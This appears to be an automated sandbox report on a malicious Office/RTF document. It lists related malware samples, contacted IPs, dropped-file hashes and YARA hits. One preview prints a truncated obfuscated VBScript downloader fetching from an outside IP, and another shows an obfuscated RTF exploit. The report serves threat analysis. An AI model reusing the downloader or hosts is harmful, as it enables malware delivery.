                uploaddeimagens.com.brzahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtfGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                gFTk7fAh55.rtfGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Comprobante_786765456776780879878968.vbsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                Product Inquiry_#466788.xlsGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                • 188.114.96.3
                SC_TR20240619.xlsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                SecuriteInfo.com.Exploit.ShellCode.69.9963.10369.rtfGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-COLOCROSSINGUSstatement .xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.16
                EY8qnRKXcx.rtfGet hashmaliciousLokibotBrowse
                • 198.46.178.137
                Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                • 198.46.178.137
                rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                • 192.227.175.142
                cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                • 107.173.4.18
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 192.210.214.9
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 192.210.214.9
                Renameme@1.xlsGet hashmaliciousUnknownBrowse
                • 198.46.178.137
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 107.173.4.18
                Renameme@1.xlsGet hashmaliciousUnknownBrowse
                • 198.46.178.137
                CLOUDFLARENETUSSecuriteInfo.com.Win32.Evo-gen.6791.6790.exeGet hashmaliciousPython Stealer, CStealer, XmrigBrowse
                • 104.26.2.16
                http://differentia.ruGet hashmaliciousUnknownBrowse
                • 172.67.71.89
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                https://guardianesdelbosque.orgGet hashmaliciousUnknownBrowse
                • 104.22.50.131
                mirai.mips.elfGet hashmaliciousMiraiBrowse
                • 162.159.162.231
                mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                • 1.2.57.176
                https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1Get hashmaliciousUnknownBrowse
                • 104.21.82.77
                https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                • 172.64.151.101
                https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpgGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                [EXTERNAL] Action Required_ ACH Remittance Review AbrholdingsGet hashmaliciousUnknownBrowse
                • 172.67.179.83
                NEXINTO-DE69Y89zK8T9.elfGet hashmaliciousUnknownBrowse
                • 212.229.189.58
                KR6MiT3nT1.elfGet hashmaliciousMirai, MoobotBrowse
                • 212.221.245.32
                https://rcpd.net.au/?pcr=cGF1LmZlcnJlckBhaWx5bGFicy5jb20=Get hashmaliciousUnknownBrowse
                • 194.195.251.199
                xLL3MMIGjU.exeGet hashmaliciousLodaRATBrowse
                • 194.163.162.213
                Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • 194.163.41.117
                Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • 194.163.41.117
                https://endigitalweb.com/city-of-casey-enterprise-agreement-2017/#Get hashmaliciousUnknownBrowse
                • 195.179.237.226
                Swift Advice 75,608$ USD.xlsGet hashmaliciousAgentTeslaBrowse
                • 194.163.41.117
                Product Specification Details.xlsGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                June order.xlsGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                05af1f5ca1b87cc9cc9b25185115607dstatement .xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                • 188.114.96.3
                Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
                • 194.163.41.117
                • 188.114.96.3
                Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                • 194.163.41.117
                • 188.114.96.3
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                • 188.114.96.3
                20240506_12082.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                • 188.114.96.3
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                • 188.114.96.3
                zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                • 188.114.96.3
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                • 188.114.96.3
                SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                • 188.114.96.3
                Plata.docx.docGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                • 188.114.96.3
                No context
                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                File Type:data
                Category:dropped
                Size (bytes):101852
                Entropy (8bit):1.5913008549850765
                Encrypted:false
                SSDEEP:384:hzy+dnGbLq+AKzZQ9w/fQ1D+v+W2gnHwvAgIEyXG1oJ/+oE1ckdcWMuZmBKh1:6wvgnHwvAP
                MD5:0DA803B40584EF9709DD06B0FD3D2C61
                SHA1:E68DEB026E2F460EF2F6D985F604EE22B8319782
                SHA-256:41054DD24D6674C11B46C7E21BBE5772DBAB6C64AC93D16F4D081C16C27E71FC
                SHA-512:1C8F6B70EFD9B98ED269F030AB8F7DB9CC99A2F5E04B102440801A770081A1CE7F639531735F723622C457449BB87D8D0EC34C4141C0BF5B91B26FE486B33D37
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02555472380356475
                Encrypted:false
                SSDEEP:6:I3DPcLdyIvxggLRLL6duDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPayenL6duvYg3J/
                MD5:275467E6780C37AE8123C88438C512BF
                SHA1:9FAB04FCAB90E13397F240E273CC0A526336F3AD
                SHA-256:7BB1686E2E1985ACCA5AC310DB73689ADF04371BDD185E2404433D3331759CFA
                SHA-512:FB10533302F1364FCCE0BB2854054B751CA36AADC2F6BC7AA78BC2A839978C44248608E1717D037CF366FAFD428E4F7BE2D125CF06FDD5456FC3D918053A36D4
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z..C....A.q.....S,...X.F...Fa.q...............................C.H.e.' .........v:.v..F..PO.,|......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.34726597513537405
                Encrypted:false
                SSDEEP:3:Nlll:Nll
                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:@...e...........................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):210665
                Entropy (8bit):2.235640826235748
                Encrypted:false
                SSDEEP:3072:6cwSZUSF1Tq1if5tGu49Ya3v7XaKyD+teofxsLNk9:5wSZUaTq1iPGlYa/7XaKW+A2eLNk9
                MD5:FC6D03389137A4F7B1C724EC632A3E13
                SHA1:4BAAEB9B744174CDA60DD44D32C8B93088B34DA6
                SHA-256:DFC80706C16EF11550F70829E4EDD5722FDA298BC55FCDFF152F1A5E85FDDB28
                SHA-512:A64EDB343F2FBFEFB078FEC9B3F5D12E45CA1E5C66D34C67A0DA7BBEEC309AB3B1504AD31B540E9EA494B643FA4A2A4824B267F7FD51C2EAB648D3405AAE13D2
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:{\rtf1.........{\*\urtf347361619 \_}.{\943658764`*3^|;^||%(.36]048(^5)_?.;+&%&(%^.1/#%',;9=_:*|.-^@:#1%+1/?#,5#32]3*.<]?8(7.4^.&?+5)2#|~~1!%31`?1;,`4-?36/-5?_0+?--`???6.%`53!@(.`;3,?._+7&~&&].*^;?`1/-~@7?355!/?->?&@.^];&.4_*?]'_=3?]36?0?5];_0??!;^1]&[:~.1?,32/0$^3=*-?2.@7@.7>|55#7%4(?_7.+_6+$=?(7?/>41??6$_~.2*1]$?'4;`.~34?>1.:'7^~%%_+|?..(=9*|&:?;5~-#`%,%@)2<10*|.]%>)?=+,)&*?%!%]>._7]08.%|?9^!.]|$3|<^^/]8/3|?^4+,[:0|??<1(??+:|$/@57$^>,:#%4?3%?(.''>3(^$7|)9@&|)/._..?.+?^%38(,@^??.4/?<=.@_]?#~+@?<#.6;,4+4%!/![*_4!(?7?%.:=/&@?0.?!?&,.*6[,0!7>+`?>1%35<#@@%...?--<+<<1-~,=4=/-;^$.5^?3[.3.2_!.8%?6~_?]+@71.!.9.?29+]'%~.>5>:$/2`-.(%7+#?2>1@;@.3#+9.?`#^7~^?=^2!..]]9=-_@5.(<[5,|>|1$?.<&:+:7_4.8:87+/?+3<>!+&&72_9]3@)8>6=5.?44:+4<+?23_|**+7@#)?8?<?&.<&07*2.?|>|1[#,!$[9=`1`,4?+.7@>-[!,-.2_2[.?5#|;73^8[[#(?+%8).+.|%5%=+?%&5?,2&?15;]^!'?-0(.>)2.?.^!'(%`*22*%??1>286!??[*;?09)2]=,;$@~/?.5&?/;,;??~@,[-.?(9`%;>.'!?~@@.?*@../?4^%|5!1?[=08?&_$;?9_@41#<?'.977'6-,'`->(-4.7&4.;0%#?.?]-_9&4%!-~%>7.6-&<]9$</6#?]
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):3492
                Entropy (8bit):3.712425528744081
                Encrypted:false
                SSDEEP:96:vH6OQwJH6OrH6ODnH6OMH6O7WH6O/LcDnJkxH6O6:/RhJEmlLcDn6xM
                MD5:EA1D347A4039B2E1E28ABC47632FEC36
                SHA1:665B0B2848158A97B869BC857B960E5B368C8FC3
                SHA-256:6EE8EEFF1A72D43329384218C45CBAF41DF6B7F3AFC7B95138B24087B796B07F
                SHA-512:355B6F49CC0034E642396C98B84A9B7C91A51604E27E91111B4790E08BCDBF863D3183854D103983D8C78C9A201B7A13187E72762017D0B718136FFD53A4544D
                Malicious:false
                Preview:..D.i.m. .R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d.,. .T.L.L.A.U.k.J.e.W.H.k.f.U.W.d.K.r.x.L.U.i.n.m.z.f.W.S.t.B.p.t.x.K.c.W.l.x.L.Q.W.g.p.K.h.a.m.i.L.O.U.R.B.K.L.e.d.u.G.k.Z.x.K.f.P.d.b.o.N.B.h.R.W.L.R.L.e.Z.N.o.r.b.K.U.L.Z.b.c.I.n.c.p.U.v.W.T.z.r.q.P.B.....S.e.t. .R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.4.1...2.1.6...1.8.3...1.3./.U.s.e.r.s._.A.P.I./.s.
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):43908
                Entropy (8bit):3.140989976420041
                Encrypted:false
                SSDEEP:384:eHjwZ9CKd4mpX57EqfxxyZUO9h1eAv2nwvE/8uEK/N:OKpXNEqfd8+VnYE7
                MD5:8351C59D10C7D232E71699A20FAA0582
                SHA1:9FBB25F3793BD0C8C41913FCAE9393ADBF35BEA8
                SHA-256:1ACDF49D80CC1C7B8EDFBC63B9D35428390A8A00A39B9328DDFC74BAA3C44EB7
                SHA-512:322223A09926D01CE59A013F3433E6C2E5FA7C78F43FFD824BF45CAEE25254E7A6CF68523563D8DBFA5D0A8DE02279A333CCAF4EF1BCF6B35B5AD037C3467AFC
                Malicious:false
                Preview:....l...........;...............~@..xW.. EMF........!.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................................p..D.......................................... .E...........................G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...?.....6...............`...................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1847212
                Entropy (8bit):1.5905625741246265
                Encrypted:false
                SSDEEP:3072:Jfw4M6Wuo/yiO9r5e+8J2dvRRvMdnux/ZiOE85e+8J2dvRcvMyX:Jfw4MTuKO9l8J0WuGOE68J0A
                MD5:8F49B5A3A5C66A3D4AFEBFF5560D700E
                SHA1:330ADB868799FFE2FA9A0CEC46408DCF42809F84
                SHA-256:084865F0440D90AB2746F9F8F4B8A208192768EA1CCA08C2E7B1BCF7DF3E56D3
                SHA-512:82117F83204E7621C48906AE3312C248974C5DFA088C1B1BE710F019BAFED406C69159EC2140375A67D9793ECC02C300C9E8A1C1AC409289AE453DD6C165660C
                Malicious:false
                Preview:....l...........^...r...........QN...a.. EMF...../..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):884312
                Entropy (8bit):1.2944965349348616
                Encrypted:false
                SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                Malicious:false
                Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1846972
                Entropy (8bit):1.5893417831629928
                Encrypted:false
                SSDEEP:3072:+zg4Mxuo/yiO9r5e+8J2dvRRvMdvmWux/ZiOE85e+8J2dvRcvMym:+zg4MxuKO9l8J0AmWuGOE68J0R
                MD5:8353C019D97558D11AE2191FB65D8596
                SHA1:C7A92B5986413D4586EAEF966584EC753DF2EF9A
                SHA-256:8BFBF9E129AACF4868CC5290A1E66A18C4B8A71018AADDA05902F26C70424C87
                SHA-512:5F1A1CEC13D3A1FC00A3C2D29B6E640A613B2EAC2B42D0E1F40384973CA7709473D95DDBDAE098A70BDA2C700909070F0895B6E3E4F84F8F3E606D1A6D1CFB8B
                Malicious:false
                Preview:....l...........^...r...........QN...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13328680
                Entropy (8bit):1.5643138329704667
                Encrypted:false
                SSDEEP:768:q63AYhP7YgsXW9s7Z+3Zv6j6M1cv+BINGkIsIdDcFXXlG5xK0SN7u:qgo3+3ZviTcvoDkXlG5XSQ
                MD5:2799EF71A3A070C8F75094A70E785CB3
                SHA1:74B47B2D359AA51F97491C079E95664E295371C7
                SHA-256:AF2429FEC6E5CE4F86804F436E61AC49402A6019DF99501C11C374DC7825D504
                SHA-512:94718C2FF3D44A6FB06D0EDCA19E5E36A5057EF7FD7D0C3F06FAC3620EDBF61D87B88633711E40D4D7986D45AADC7E6ABC6FB9B328BE798469F113CF7AF6C44C
                Malicious:false
                Preview:....l...........P...............A_...... EMF....(a..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q.......'.......................%...........................................................&...........................%...........................6.......P.......%...........L...d...........O...............P.......!...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13328680
                Entropy (8bit):1.5643169647912663
                Encrypted:false
                SSDEEP:768:q63APhP7YgsXW9s7Z+3Zv6j6M1cv+BINGkIsIdDcFXXlG5xK0SN7u:q9o3+3ZviTcvoDkXlG5XSQ
                MD5:992A1E6D24A12107F69F58030011DEC7
                SHA1:7CF75A29F778D9A96C43171B0F66996AEDA01E56
                SHA-256:C22DF47ABDACD467445FDD180E346B055D45808E18959C0326E1921456A09E81
                SHA-512:943B9CA570410CCDF50BB32AC51E5B00F603B89B76B993FD65C8449A1313C6FCEFA212A927493537E31DE562F94CDB2B77350CAEF3E57FD8FC3BF512D173183A
                Malicious:false
                Preview:....l...........P...............A_...... EMF....(a..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q.......'.......................%...........................................................&...........................%...........................6.......P.......%...........L...d...........O...............P.......!...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1846972
                Entropy (8bit):1.5893417831629928
                Encrypted:false
                SSDEEP:3072:+zg4Mxuo/yiO9r5e+8J2dvRRvMdvmWux/ZiOE85e+8J2dvRcvMym:+zg4MxuKO9l8J0AmWuGOE68J0R
                MD5:8353C019D97558D11AE2191FB65D8596
                SHA1:C7A92B5986413D4586EAEF966584EC753DF2EF9A
                SHA-256:8BFBF9E129AACF4868CC5290A1E66A18C4B8A71018AADDA05902F26C70424C87
                SHA-512:5F1A1CEC13D3A1FC00A3C2D29B6E640A613B2EAC2B42D0E1F40384973CA7709473D95DDBDAE098A70BDA2C700909070F0895B6E3E4F84F8F3E606D1A6D1CFB8B
                Malicious:false
                Preview:....l...........^...r...........QN...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3153548
                Entropy (8bit):2.739471189598155
                Encrypted:false
                SSDEEP:768:fa70zO9nQ8NGro8LNJcF+/86AvcDOPRBBVbbQm:fBXVJ8NvcDEzVPF
                MD5:ED71466E3B22D54C501EA175EEEFA127
                SHA1:2AC9D83749B53E522F0CDA5682975BE3AEE94F35
                SHA-256:3E1C8BEFB1852CDE90EF5E576E57E703EC814E15DFE94BB16118ED68B0389236
                SHA-512:EF9F6435BDDF3E8A5DF803D74C75C1092FF9A5697240A0823359F3C7B54B67C461B2826849B5223B06269A1865553D6DFB17150B70079CB8A65371611C61E3B6
                Malicious:false
                Preview:....l...........@...............Yj...... EMF......0.............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ...'.......................%...........................................................&...........................%...........................6.......@.......%...........L...d...........?...............@.......!...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13328680
                Entropy (8bit):1.5643169647912663
                Encrypted:false
                SSDEEP:768:q63APhP7YgsXW9s7Z+3Zv6j6M1cv+BINGkIsIdDcFXXlG5xK0SN7u:q9o3+3ZviTcvoDkXlG5XSQ
                MD5:992A1E6D24A12107F69F58030011DEC7
                SHA1:7CF75A29F778D9A96C43171B0F66996AEDA01E56
                SHA-256:C22DF47ABDACD467445FDD180E346B055D45808E18959C0326E1921456A09E81
                SHA-512:943B9CA570410CCDF50BB32AC51E5B00F603B89B76B993FD65C8449A1313C6FCEFA212A927493537E31DE562F94CDB2B77350CAEF3E57FD8FC3BF512D173183A
                Malicious:false
                Preview:....l...........P...............A_...... EMF....(a..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q.......'.......................%...........................................................&...........................%...........................6.......P.......%...........L...d...........O...............P.......!...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):45556
                Entropy (8bit):3.2389256176191146
                Encrypted:false
                SSDEEP:384:IAB0utfMq2/aXmD7YsZgyXrHUpNDEk1Y6iJV6smkgjYx16U+z0pdkblo3OhG+U:7Uq2/JjZgyrH+Xs6UaAdelo+C
                MD5:65103012FD0D90B64E04605779EBA439
                SHA1:E28FEF0979669A7CA78C0B17E21B551E361EF85E
                SHA-256:40DE1766B2589303FF3F0C27D6CA82A28EE5A6576B7F38BEEBA017E777881CCF
                SHA-512:E02F05C6C0AE825A2074AC3EF1C48BE527A239CB898D27EC8F6B4B6543B95C9FD0F7F1249C08EAC52AC3F7C1036E2F9D5EE73F7B3465C17AFE7E5390845F040D
                Malicious:false
                Preview:................g...g...........O-..O-.. EMF................:...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...3. .(.2.4.0.5.5.4.6.,. .2.0.1.8.-.0.3.-.1.1.)...B.o.t.t.o.m. .c.o.r.n.e.r...e.m.f...................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...%...Drawing=438.1x436.0px, 115.9x115.4mm................................................................'...............0.......%...........;...............Z...+.......4.......................,......./.......`...u.......4.......................~...W.......P.......P.......4...........................P...B.......B...........4.......................B...#.......J.......J.......4...........................J...s...D...Z...+...=...........................4...............................{...................4...........................z.......i.......i.......4.......................G...i...t.......G...........4.......................%...;.......K...........=..............."...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):210665
                Entropy (8bit):2.235640826235748
                Encrypted:false
                SSDEEP:3072:6cwSZUSF1Tq1if5tGu49Ya3v7XaKyD+teofxsLNk9:5wSZUaTq1iPGlYa/7XaKW+A2eLNk9
                MD5:FC6D03389137A4F7B1C724EC632A3E13
                SHA1:4BAAEB9B744174CDA60DD44D32C8B93088B34DA6
                SHA-256:DFC80706C16EF11550F70829E4EDD5722FDA298BC55FCDFF152F1A5E85FDDB28
                SHA-512:A64EDB343F2FBFEFB078FEC9B3F5D12E45CA1E5C66D34C67A0DA7BBEEC309AB3B1504AD31B540E9EA494B643FA4A2A4824B267F7FD51C2EAB648D3405AAE13D2
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
